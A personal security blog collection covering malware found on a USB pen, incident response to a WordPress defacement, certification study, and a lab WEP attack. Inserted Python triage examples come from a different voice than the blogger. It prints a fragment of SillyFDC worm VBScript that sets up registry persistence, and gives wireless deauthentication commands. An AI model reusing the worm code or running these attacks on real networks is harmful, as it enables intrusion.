From China with Love

I received two gifts from a family member returning from China.

It was a lovely thought and I was touched by the gesture.

Both items are of the geek variety and were bought from stalls: one a ballpoint pen with a built-in 2GB USB stick that can act as a voice recorder, the other a 240GB USB stick.

2GB USB voice recorder pen

3-in-1 Pen-recorder-malware

240GB Flash drive - really?

Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some pieces of technology come with free added “extras”.

I have to admit some level of amazement when told of the 240GB USB flash drive, especially when the aforementioned relative said he hadn’t seen the 500GB USB flash drive until after he’d bought this one. I thought the largest current flash drive available was only 128GB; sadly, it appears I was right. A quick search for “240G Sony” quickly turned up this page. This thing is a total fake and is actually a whopping 32MB. However, it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the auditors next time they’re in the office.

Wow it's really 234GB - honest!

I plugged both USB devices into a spare Linux machine, just to see if any software was on either. The fake 240GB USB was empty, but the recording pen had lots of goodies.

The first thing that caught my eye was the autorun.inf file. A quick look at that pointed to an MS-DOS.COM saved on the pen. After a quick imaging of the files, I decided to open a copy of the MS-DOS.COM.

The random-looking junk didn’t quite look like normal .COM file junk; if only I could have taken the SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I might have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognize and understand appeared in plain English.

This is some of what I extracted:

Dim fs,rg
Set fs = CreateObject("scripting.filesystemobject")
Set rg = CreateObject("wscript.shell")
On Error Resume Next
rg.RegWrite "HKCR\.vbs\", "VBSFile"
rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"
rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"
rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

– Plenty more VBS code chopped out –

This clearly isn’t a real .COM file. Two seconds of searching found that this is a variant of the SillyFDC worm. A write-up of it here talks about how it was slapping US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.
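The triage the post describes by hand (read autorun.inf, find what it launches, pull the readable text out of the opaque file, spot the registry persistence) can be scripted. The following is an added example, not code from the post; the autorun.inf and payload bytes are constructed to resemble what the post describes, and the indicator names (run_key, screensaver_hijack and so on) are my own labels:

```python
import re
from collections import defaultdict

# Constructed sample autorun.inf, modelled on the one described in the post
# (example data, not the file from the pen).
SAMPLE_AUTORUN_INF = """[autorun]
open=MS-DOS.COM
shell\\open\\Command=MS-DOS.COM
shellexecute=MS-DOS.COM
icon=MS-DOS.COM,0
"""

# Constructed sample payload: opaque bytes followed by embedded script text,
# mimicking "halfway through the file the readable stuff appears".
SAMPLE_PAYLOAD = (
    bytes([0x00, 0x7F, 0x80, 0xFF, 0x01, 0x1B]) * 64
    + b'Set rg = CreateObject("wscript.shell")\r\n'
    + b'rg.RegWrite "HKCU\\Control Panel\\Desktop\\SCRNSAVE.EXE","C:\\WINDOWS\\pchealth\\helpctr\\binaries\\HelpHost.com"\r\n'
    + b'rg.RegWrite "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\","C:\\WINDOWS\\system32\\dllcache\\Default.exe"\r\n'
    + bytes([0x00, 0xFE]) * 16
)

# Keys in [autorun] whose value names a file Windows would execute.
EXEC_KEYS = ("open", "shellexecute", "shell\\open\\command")

# Persistence / hijack techniques visible in the extracted VBS (my own labels).
PERSISTENCE_PATTERNS = {
    "run_key": re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I),
    "screensaver_hijack": re.compile(r"SCRNSAVE\.EXE", re.I),
    "file_assoc_hijack": re.compile(r"HKCR\\[^\"\\]+\\Shell\\Open\\Command", re.I),
    "wsh_object": re.compile(r"CreateObject\(\"(wscript\.shell|scripting\.filesystemobject)\"\)", re.I),
}


def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys."""
    section, cfg = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            cfg[key.strip().lower()] = value.strip()
    return cfg


def autorun_targets(cfg):
    """Files the autorun.inf would cause Windows to run, in key order, deduplicated."""
    targets = []
    for key in EXEC_KEYS:
        if key in cfg:
            target = cfg[key].split()[0]  # "open=foo.exe /arg" -> keep the program name
            if target not in targets:
                targets.append(target)
    return targets


def extract_strings(data, min_len=8):
    """Printable-ASCII runs of at least min_len bytes, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def classify_strings(strings):
    """Map each persistence indicator to the strings that triggered it."""
    hits = defaultdict(list)
    for s in strings:
        for name, pattern in PERSISTENCE_PATTERNS.items():
            if pattern.search(s):
                hits[name].append(s)
    return dict(hits)


def triage(autorun_text, payload):
    """Summarise what a removable drive would do if autorun were honoured."""
    cfg = parse_autorun(autorun_text)
    strings = extract_strings(payload)
    return {
        "autorun_targets": autorun_targets(cfg),
        "indicators": classify_strings(strings),
        # how much of the file is readable text; a half-text ".COM" is a tell
        "printable_fraction": round(sum(len(s) for s in strings) / max(len(payload), 1), 2),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_AUTORUN_INF, SAMPLE_PAYLOAD)
    print("autorun would run:", report["autorun_targets"])
    print("printable fraction:", report["printable_fraction"])
    for name, lines in report["indicators"].items():
        print(f"[{name}]")
        for line in lines:
            print("   ", line)
```

Run it against a mounted stick by reading autorun.inf and the file it names; the patterns are deliberately generic (Run/RunOnce keys, SCRNSAVE.EXE, HKCR shell\open\command hijacks), so they will also light up on legitimate installers, which is the point of triage rather than verdict.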

Moral of the story: if you buy kit like this, for the “best price”, from a back-street stall, buyer beware. Unless you’re a malware researcher, in which case go mad: it’s Christmas Day with every item bought!

Being Defaced and cleaning up

One of the wonderful pieces of IT security defense is planning for when you get your arse handed to you. The more technical term is incident response, but it’s not as much fun to say to your mates at the pub.

Being attacked and having to recover is sadly part of IT life these days, but the more practice, the better you get at it. I’m oddly indebted to this particular attacker as it meant I’ve had to spend time understanding how the hosting company works, how this site is put together and the glaring shortfalls of outsourcing management and security to a third party.

On the 31st of May this blog was defaced and had a number of files uploaded to it.

The defacement was of a political, religious statement nature, and I’d suggest that defacing web sites is a bit of a waste of time. Given the attacker lives in a democracy, whether he believes it is one or not, I’d recommend he spend the time working in worthwhile, legal groups to express his views or simply help out the local community. If you have a voice and a vote, use it; people change the world by words and deed, not by petty vandalism or criminal PayPal pharming schemes to steal money from your fellow man. I’ll get off my soap box now.

On the 7th of June, I actually noticed the defacement. Oops.

Note to self – be more narcissistic and look at my own blog more often.

In under a minute, I went from shock to annoyance to curiosity. How did this guy get in, what was he actually doing and would I be able to work out how to stop it again?

I wasn’t able to log on to cPanel to control the site; the wacky security of putting it on a random port over HTTPS does not work from locked-down corporate environments.

So the first step was to call the hosting company and ask if this was a mass defacement or just me. A number of hosting companies hosting WordPress sites had been compromised due to their bad practices, so best to check. Fortunately for me, I got the support “consultant” that struggled with English. After a painful twenty minutes, the best I got out of the conversation was for him to reset a password, and that mine was the only site hacked. More on this later. He did offer the gems of: change your password every couple of weeks and don’t set stuff to 755. Magic. If I was a normal human being, 755 would mean the world to me. Thank you!

This is now a great time to bring up the SANS six-step incident response process. These steps help work through how to deal with this mess:

1. Preparation
2. Identification
3. Containment
4. Eradication
5. Recovery
6. Lessons learned

Identification

After finishing work, I finally got on to the site control panel via cPanel and kicked off a backup of the site, just to examine offline what had happened.

The defacement was a simple replacement of the index.php file, which contained a lot of metadata. This metadata confirmed the OS, who had customised the OS and where to get a copy of it, what version of Word the defacement page had been made with and a few other pieces of helpful data. What was really interesting was the uploaded fake PayPal.fr payment page: sub-directories and files in the public_html folder. The blog’s site logs also contained entries like this:

/~silkhous/PayPaI.Com/confirmmation4548664512884645384534/B!M@R/ProfileCCAdd.js

The /~silkhous refers to another home directory on the same hosted server as my blog. Looks like the other site was suffering the same problem; so much for mine being the only site attacked. Nice work, hosting provider!
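The log entry above is the kind of thing a small access-log scan can surface automatically: a brand name spelt with a lookalike character (the capital I in PayPaI) sitting under another account’s ~home directory. Here is an added example of such a scan; it is my code, not the blog’s, and the log lines, IP addresses and timestamps are constructed to resemble the entry quoted above:

```python
import re

# Constructed Apache-style access log lines, modelled on the entry quoted in the post
# (addresses and timestamps are made up for this example).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jun/2010:21:14:02 +0100] "GET /~silkhous/PayPaI.Com/confirmmation4548664512884645384534/B!M@R/ProfileCCAdd.js HTTP/1.1" 200 1822
203.0.113.7 - - [07/Jun/2010:21:14:03 +0100] "POST /~silkhous/PayPaI.Com/confirmmation4548664512884645384534/B!M@R/login.php HTTP/1.1" 302 0
198.51.100.9 - - [07/Jun/2010:21:15:10 +0100] "GET /2010/05/wifu-exam/ HTTP/1.1" 200 9120
198.51.100.9 - - [07/Jun/2010:21:15:11 +0100] "GET /wp-content/themes/default/style.css HTTP/1.1" 200 4100
"""

# Brands whose name has no business appearing in a path on a personal blog.
WATCHED_BRANDS = ("paypal", "ebay", "bankofamerica")

# Characters commonly swapped in to dodge naive string matching.
HOMOGLYPHS = str.maketrans({"I": "l", "1": "l", "|": "l", "0": "o", "5": "s", "3": "e"})

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)
HOME_DIR_RE = re.compile(r"^/~([A-Za-z0-9_.-]+)/")


def parse_line(line):
    """Parse one combined-log-format line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def normalize(segment):
    """Fold homoglyphs first, then lower-case: 'PayPaI.Com' -> 'paypal.com'."""
    return segment.translate(HOMOGLYPHS).lower()


def brand_hits(path):
    """Path segments that spell a watched brand, with or without homoglyphs."""
    hits = []
    for segment in path.split("/"):
        folded = normalize(segment)
        for brand in WATCHED_BRANDS:
            if brand in folded:
                # lookalike == True means the raw text only matches after folding
                hits.append({"segment": segment, "brand": brand,
                             "lookalike": brand not in segment.lower()})
    return hits


def scan(log_text):
    """Return one finding per request whose path impersonates a watched brand."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for hit in brand_hits(rec["path"]):
            home = HOME_DIR_RE.match(rec["path"])
            findings.append({
                "ip": rec["ip"], "method": rec["method"], "path": rec["path"],
                "status": rec["status"], "brand": hit["brand"],
                "lookalike": hit["lookalike"],
                # which account's home directory is serving the page, if any
                "home_dir": home.group(1) if home else None,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        kind = "homoglyph" if f["lookalike"] else "plain"
        print(f'{f["ip"]} {f["method"]} {f["path"]} -> {f["brand"]} ({kind}, home dir: {f["home_dir"]})')
```

A hit with home_dir set to an account other than your own is exactly the “another site on the same box is compromised” signal the post found by eye, and is worth handing to the hosting provider along with the report to the brand being impersonated.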

This caused an instant road block. Alerting PayPal that people were being pharmed outweighed my curiosity and the recovery process. As there’s no clear, direct way to contact PayPal’s security team, I had to go through customer service. The very nice lady was somewhat taken aback that someone might do this and asked me to submit my findings to an email address. When I asked to speak to someone directly, I was told the security team was a back office group and couldn’t be directly contacted. Oh well, the PayPal rep was helpful and was pretty excited, so I sent the details off and went back to the clean up.

Containment, Eradication and Recovery

What I’d found didn’t give me any real clear indication of how the attacker got in. I knew what he’d done to the site, and as he’d kindly defaced the site and tagged it with his email address, I was able to find out a fair bit of information on him just from search engines. Still, no clear method of how he got in.

The common options to break into a WordPress/web site are:

1) The hosting provider is vulnerable to attack, and attackers then control the entire server*

2) Bad passwords – allowing brute force attacks (password guessing)

3) Poorly written plug-ins allow attackers to execute code and commands on the site

4) Old versions of WordPress allow attackers to execute code through known vulnerabilities

I can safely rule out 2 and 4 as entry points, which leaves only 3 as something I can do about it now.

Since I make backups of the site after every x blog pieces I upload, I decided to delete the entire site and upload a fresh copy of WordPress. Using a couple of good articles from WordPress, I picked the parts that worked for me to add additional security.

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://codex.wordpress.org/Hardening_WordPress

I then moved old versions of the content back to the blog, tested, made a few more changes, took a backup again, then reset the passwords again and ran one final check.

*Should this happen again, time to move web site providers to someone who keeps their OS and software up to date…
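Wiping the site and re-uploading a fresh WordPress works, but the same backup-plus-fresh-copy pair also answers “what exactly did he change or add?”: hash every file in a clean install and in the live tree and diff the two. The following is an added example of that comparison, my code rather than anything from the post or from WordPress; the two sample directory trees are constructed in temporary folders, and the flag names (php_in_uploads, unexpected_top_level, modified_vs_baseline) are my own:

```python
import hashlib
import tempfile
from pathlib import Path

# Directories WordPress writes media into; PHP here is a red flag.
UPLOAD_DIRS = ("wp-content/uploads/",)
# Top-level entries a stock WordPress install is expected to have (subset).
EXPECTED_TOP_LEVEL = {"index.php", "wp-config.php", "wp-content", "wp-includes",
                      "wp-admin", "wp-login.php", ".htaccess"}


def hash_tree(root):
    """Map each regular file's path (relative, POSIX style) to its SHA-256."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def diff_trees(clean, live):
    """Compare a known-good tree against the live site: added, removed, modified."""
    return {
        "added": sorted(k for k in live if k not in clean),
        "removed": sorted(k for k in clean if k not in live),
        "modified": sorted(k for k in clean if k in live and clean[k] != live[k]),
    }


def flag_paths(diff):
    """Attach a reason to the paths an incident responder should look at first."""
    flags = []
    for path in diff["added"]:
        if path.startswith(UPLOAD_DIRS) and path.lower().endswith((".php", ".phtml", ".php5")):
            flags.append({"path": path, "reason": "php_in_uploads"})
        elif path.split("/")[0] not in EXPECTED_TOP_LEVEL:
            flags.append({"path": path, "reason": "unexpected_top_level"})
    for path in diff["modified"]:
        # wp-config.php and theme files legitimately differ from stock, so this is
        # a "look at it" flag, not a verdict
        flags.append({"path": path, "reason": "modified_vs_baseline"})
    return flags


def audit(clean_root, live_root):
    """Hash both trees, diff them and flag the interesting paths."""
    diff = diff_trees(hash_tree(clean_root), hash_tree(live_root))
    return {"diff": diff, "flags": flag_paths(diff)}


def _write(root, rel, content):
    p = Path(root) / rel
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(content)


def make_sample_site():
    """Construct a tiny clean tree and a 'defaced' copy in temp dirs (example data)."""
    clean = tempfile.mkdtemp(prefix="wp-clean-")
    live = tempfile.mkdtemp(prefix="wp-live-")
    for root in (clean, live):
        _write(root, "wp-config.php", "<?php define('DB_NAME', 'blog');\n")
        _write(root, "wp-content/themes/default/style.css", "body { margin: 0 }\n")
        _write(root, "wp-content/uploads/2010/05/photo.jpg", "not really a jpeg\n")
    _write(clean, "index.php", "<?php require './wp-blog-header.php';\n")
    # the live copy: defaced front page plus two files the attacker dropped
    _write(live, "index.php", "<html><body>defaced</body></html>\n")
    _write(live, "PayPaI.Com/login.php", "<?php /* fake payment page */\n")
    _write(live, "wp-content/uploads/2010/05/image.php", "<?php /* should not be here */\n")
    return clean, live


if __name__ == "__main__":
    clean, live = make_sample_site()
    result = audit(clean, live)
    for key, paths in result["diff"].items():
        print(f"{key}: {paths}")
    for f in result["flags"]:
        print(f"  [{f['reason']}] {f['path']}")
```

Point audit() at an unpacked copy of the WordPress release you run and at the backup you pulled from cPanel; everything under “added” that is not your own content, plus any modified core file, is the list to eradicate before restoring.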

Lessons Learned

  • RTFM WordPress’ security guides
  • Avoid having gadgets and plugins just because the look pretty
  • Understand the structure and layout of WordPress and the web site
  • More regular backups
  • Rotate the access logs off the server

So am I safe now?

Possibly, possibly not.

I can say I’ve improved the security of the site and cleaned up some crap. As I still don’t know how he got in, he may just read this, get annoyed and deface the site again using the same hole he did last time. As I think he just ran an automated scanner to find “x” problem then automatically exploit it, he probably won’t read this or even visit the site. Saying that, only a very small number of sites got exploited, so he might come back to visit. :-)

If so and that’s you Mr Attacker- Bonjour là, signalent un commentaire et me font savoir vous êtes entré la première fois. Merci !

I would have used Arabic, but I don’t really trust the translation software. I’ve seen what it does to English.

Study, more art than science

The folks on Twitter have provided a couple of quite thought-provoking links on the subject of study.

Jason Haddix linked this:

http://measuringmeasures.com/blog/2010/4/19/7-tips-for-successful-self-learning.html

The folks at Cisco Security linked this:

http://etherealmind.com/why-the-ccie-program-is-more-useful-than-the-certification-itself/

I like to think each of us has to find our own way to study, whether it be driven by passion, need or simple curiosity.

My current method is to block out an hour from 8 to 9 pm for serious study. This means avoiding distractions – random browsing, TV, tweets, books, arranging DVDs in alphabetical order and so on – and focusing on one topic.

This, so far, has sort of worked.

www.Packetstan.com – A new Nation for Packets to stand proud

It’s as if one of my many random, vague and confused wishes to the Webi-verse has finally been answered.

Mike Poor has created:

www.packetstan.com 

for all things packet-like.

It’s all about packets and crazy things people do to them.

If that wasn’t enough, the first article has been written by Judy Novak. Judy is a rock star of the analyst world and recently received a lifetime achievement award from SANS for her work in this field, plus was one of the authors of the Intrusion Detection In-Depth SANS 503 course.

If you have no idea what I’m on about, or why I think this is amazing for network/security professionals, sign up for Intrusion Detection In-Depth immediately. Do it now, right now. I’ll still be here once you’ve taken a magical trip into the core of the Internet’s communication DNA and peeked into a world full of hex, binary and payloads.

I can only hope Mike convinces Judy to spill some more of her secrets and tips, plus gets many more people to chime in with articles, as this would be an utterly amazing resource for anyone that has to deal with analysing packets on or off the wire.

GSE Exam in SANS Network Security 2010

Been a busy few months in the real world with work, life and everything else.

Since passing the GSE written exam, I’ve been building up a lab, practical practice examples and a stock of reading reference materials. I’ll blab on about the books and what they are at some later point. An interesting aside: some of the operating systems used in the GSE exam have been updated. Backtrack 1 now becomes Backtrack 4 and Fedora 4 becomes Fedora 12, so a great time to master more current OSes.

The two-day practical part of the GSE exam takes place in Las Vegas on the 18th and 19th of September. This means I’ll finish two days of examination hell just in time for the SANS Network Security 2010 conference.

As I’m in Las Vegas and SANS is running one of its biggest conferences of the year, I’d be remiss not to try to squeeze in a bit more training.

I’ve applied to be a volunteer as part of the SANS work study program and am crossing my fingers to be accepted. With forty courses on offer, my number one choice is Steve Sims’ Developing Exploits for Penetration Testers and Security Researchers.

This course is really out of my comfort zone and a huge challenge in itself, never mind the GSE study that I’m doing. I’ve only really played with the skills the course teaches while studying for OffSec’s PWB exam, but the topic is compelling and will help lift the shroud from the script kiddie tools that I use. With both Steve Sims and Jim Shewmaker teaching the course, it should be absolutely brilliant to be able to learn from both these guys and mature my understanding of this complex piece of IT security.

I’ve noticed that some very smart cookies are taking this course, including Wesley McGrew. Great: real security researchers, coding gurus and me. Well, at least I know asking the person sitting next to me what this all means should get a sensible answer :-)

Things that know PING, Packet Decode

The last few weeks have been all about the packets, it seems. We’ve found and fixed a couple of wacky problems at work by looking at packet captures, Netmon 3.4 beta is out, I’ve devoured Laura Chappell’s new Wireshark book, started playing with Scapy, read the new Honeynet challenges and now I discover my 502 teacher, Chris Brenton, has a web site and an iPhone app showing love to the packets!

While stuck on a bus, I was idly sifting through Apple’s App Store when I found Packet Decode. Somewhat intrigued, I had a look at it and noticed it was made by my old SANS instructor. Hoping this wasn’t some wacky joke by Chris, I bought the app and had a play. The simple description is that it is an IP/ICMP/TCP/UDP (v4 and v6) cheat sheet on steroids.

This is pretty darn helpful, as Chris has written clear descriptions of each field within the packet and has some nifty filters for Wireshark and tcpdump. Some thought on how the info is displayed means this isn’t cumbersome to navigate, making it a functional and useful portable reference. Now if only he added a DNS section, my paper SANS TCP/IP cheat sheet could rest happy.

Great as a quick reference, memory jogger or, as I intend to unleash at the next geek pub crawl, a way to torture those around me with random facts and demands to know the tcpdump filter syntax for detecting TCP packets with a window size of less than 100. Hours of fun!
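The pub-crawl question has a cheat-sheet answer: the TCP window field sits at offset 14 of the TCP header and is two bytes wide, so the tcpdump filter is tcp[14:2] < 100. The following added example (my code, not from the app or the post) builds a minimal IPv4+TCP packet from constructed values and then evaluates that same byte-offset test the way tcpdump does, taking the IP header length from IHL so the TCP offsets line up:

```python
import struct

# tcpdump-style (offset, size) of each fixed TCP header field, as on a cheat sheet.
TCP_FIELDS = {
    "sport": (0, 2), "dport": (2, 2), "seq": (4, 4), "ack": (8, 4),
    "data_offset_flags": (12, 2), "window": (14, 2), "checksum": (16, 2), "urgent": (18, 2),
}


def ip_checksum(header):
    """Standard one's-complement sum over 16-bit words (RFC 1071)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(window, sport=40000, dport=80, flags=0x02, src="192.0.2.1", dst="192.0.2.2"):
    """Construct an IPv4 packet carrying a bare 20-byte TCP header (test data only)."""
    src_b = bytes(int(o) for o in src.split("."))
    dst_b = bytes(int(o) for o in dst.split("."))
    # data offset 5 words (no options), TCP checksum left zero for this example
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0x1000, 0, 5 << 4, flags, window, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0, 64, 6, 0, src_b, dst_b)
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return ip + tcp


def ip_header_len(pkt):
    """IHL is the low nibble of byte 0, counted in 32-bit words."""
    return (pkt[0] & 0x0F) * 4


def tcp_field(pkt, offset, size):
    """tcpdump's tcp[offset:size]: offset counts from the start of the TCP header."""
    if pkt[9] != 6:  # IP protocol field must say TCP
        raise ValueError("not a TCP packet")
    start = ip_header_len(pkt) + offset
    return int.from_bytes(pkt[start:start + size], "big")


def decode_tcp(pkt):
    """Pull every fixed TCP field out using the cheat-sheet offsets."""
    fields = {name: tcp_field(pkt, off, size) for name, (off, size) in TCP_FIELDS.items()}
    fields["data_offset"] = (fields["data_offset_flags"] >> 12) * 4  # header bytes
    fields["flags"] = fields["data_offset_flags"] & 0x1FF            # 9 flag bits
    return fields


def small_window(pkt, threshold=100):
    """Same test as the tcpdump filter 'tcp[14:2] < 100'."""
    return tcp_field(pkt, 14, 2) < threshold


if __name__ == "__main__":
    for win in (64, 8192):
        pkt = build_packet(window=win)
        print(f"window={win}: decoded {decode_tcp(pkt)['window']}, tcp[14:2] < 100 -> {small_window(pkt)}")
```

Because tcp_field() reads IHL rather than assuming a 20-byte IP header, it keeps working on packets with IP options, which is the same reason tcpdump’s tcp[] indexing is relative to the transport header rather than to the frame.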

Mr Brenton’s web site http://www.chrisbrenton.org/ has some great articles and a number of packet challenges well worth taking the time to work through.

Exception has been thrown by the target of an invocation and other Forefront humour

My wonderful Forefront Client Security management console (or FCSMC for the party people) crashed and this lovely, helpful error appeared every time I attempted to load the console. This is bad, as I can’t really look at or do anything with the console. Bad FCSMC!

Or the easy to read version:

FX:{f337d96e-45c1-4106-88b1-e417a7703d6b}

Exception has been thrown by the target of an invocation.

Exception type:

System.Reflection.TargetInvocationException

Exception stack trace:

at Microsoft.ManagementConsole.Internal.SnapInMessagePumpProxy.OnThreadException(Object sender, ThreadExceptionEventArgs e)
at System.Windows.Forms.Application.ThreadContext.OnThreadException(Exception t)
at System.Windows.Forms.Application.OnThreadException(Exception t)
at System.Windows.Forms.Control.InvokeMarshaledCallbacks()
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

Now, the server and console had been working fine for the last six months without issue. Despite no obvious alerts, warnings or errors in any of the Windows event logs or SQL logs/checks, the standard fixes didn’t work. Somewhat annoying, but having worked with Forefront for a while now, I took my default posture with these types of problems: blame SQL.

After taking my problem to the Grumpy Old DBA for “his” SQL databases breaking again, he used his mastery of many years to cut and paste the error into Google. Dominik’s Forefront Security Blog and this link popped up, referring to kb942581, which is a hotfix SQL script.

From the cause blurb on the page: “A server-side SQL stored procedure that the Forefront Client Security dashboard uses incorrectly calculates statistics when the managed computers have not reported to the collection server for more than 30 days.”

Running the script fixed the problem. Oh joy.

Offensive Security’s Wifu exam – All over, red rover

Finally.

Took the exam tonight, completed all the required challenges and sent off the proof to be marked.

I had a few minor problems trying to get my connection details to start the exam, but these were swiftly resolved by one of the very able admins in the IRC #offsec channel. He was a gentleman and got me underway swiftly.

The actual exam is straightforward and is derived from the course material. Learn and study the material, be able to do all the practicals on your own systems and you should pass.

Unlike the PWB course, this is designed for beginners to wireless theory and attacks. The wifu course provides a solid grounding in the 802.11x fundamentals and is a well balanced, straightforward introduction, but is focused toward WEP.

Obviously WEP is still alive and well, so the content is still relevant, but if you’re looking for more in-depth and all-encompassing wireless technologies, such as Bluetooth, Zigbee, and so on, Joshua Wright’s SANS Wireless Ethical Hacking, Penetration Testing, and Defenses would be more appropriate.

Anyway, it was a fun hour and a bit exam and I can claim my 10 CPE for all that work too!


Eurotrashsecurity: Security Podcast from the far side of the world – the other far side, that is

Twitter does have its uses other than discovering the security industry has its fair share of nutters and those that tweet (I’m ‘down’ with all the terms now) their most random thoughts.

Despite the madness and mysterious number of girls in underwear with names of ran-dee-12123 following me, I find a number of gems. The delightful ChrisJohnRiley and crew of the Eurotrash security podcast team are just one of those.

The guys are European based and have their own take on security news and events. Throw in bursts of, mainly English, humour and great interviews and we could have a winner here for the podcasting sec world.

Some great content and interesting commentary, plus it beats having to endure our American friends destroying the English language during their discourse on security ;-)

Either subscribe in iTunes or http://www.eurotrashsecurity.eu/episodes/eurotrash.xml and go listen to the boys on the far side of the world!

Now if the lads can fix up the web site to be a bit more respectable, that would be lovely…

Wifu Aireplay-ng SKA attack problem with Linksys WAP54G

While (finally) working through the last hands on practical of the excellent Offensive Security’s Wifu course, I hit an odd road block.

The aireplay-ng attack on SKA was not going well. This was annoying, to say the least.

My command airodump-ng --channel 1 --bssid 00:01:02:03:04:05 -w ska wlan0 was running fine and capturing traffic happily from my test Linksys WAP54G (firmware v3.1).

The four output files generated from the command appeared, but the magic .xor file refused to appear despite issuing numerous de-authentication commands:

aireplay-ng -0 10 -a 00:01:02:03:04:05 -c 00:00:DE:AD:BE:EF wlan0

Turning off and on the wireless client machine’s NIC didn’t fix this either.

I noticed the banner of the airodump-ng output:

CH 1 ][ Elapsed: 10 mins ][ 2010-04-01 09:48 ][ Broken SKA: 00:01:02:03:04:05

A quick search turned up a link to http://www.aircrack-ng.org/doku.php?id=airbase-ng, then the searching turned up various people ranting and talking madness.

Just to finish off my evening study on a sane note, I dug out an old Netgear wireless router and set it up for shared WEP encryption. Joy of joys, airodump-ng saw the authentication handshake and dumped it out into a .xor file just as it did in the notes.

I was then able to crack the massively secure 64-bit (okay, 40-bit) shared WEP key in about 10 seconds after generating enough IVs – Hurrah!